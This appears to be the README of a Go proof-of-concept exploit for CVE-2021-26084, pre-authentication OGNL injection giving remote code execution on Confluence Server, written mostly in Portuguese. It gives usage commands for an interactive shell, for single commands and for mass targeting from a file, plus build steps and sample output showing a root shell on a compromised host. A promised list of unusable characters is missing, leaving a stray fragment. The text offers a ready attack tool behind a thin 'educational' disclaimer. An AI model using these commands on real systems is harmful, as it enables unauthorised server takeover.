
CVE-2021-26084 - Injeção OGNL no Webwork do Confluence Server (RCE pré-autenticação)
Prova de conceito para CVE-2021-26084.
Injeção OGNL no Webwork do Confluence Server (RCE pré-autenticação)
Isto é apenas para fins educacionais. Não sou responsável pelas suas ações. Use por sua conta e risco.
Devido ao payload, não é possível passar alguns caracteres. A lista abaixo é o que encontrei durante os meus testes.
"| go run exploit.go -t <target> -i
Exemplo
root@localhost:/# go run exploit.go -t http://localhost:8090 -i
CVE-2021-26084 - Confluence Server Webwork OGNL injection
Made by Tay (https://github.com/taythebot)
time="2021-09-02T00:29:37+09:00" level=info msg="Checking if https://localhost:8090 is vulnerable"
time="2021-09-02T00:29:39+09:00" level=info msg="Target https://localhost:8090 is vulnerable"
root@confluence:/# whoami
root
root@confluence:/# exit
Exiting interactive mode, goodbye
exit para sair do shell interativogo run exploit.go -t <target> -c <command>
go run exploit.go -f <file> -c <command>
go mod download
go build exploit.go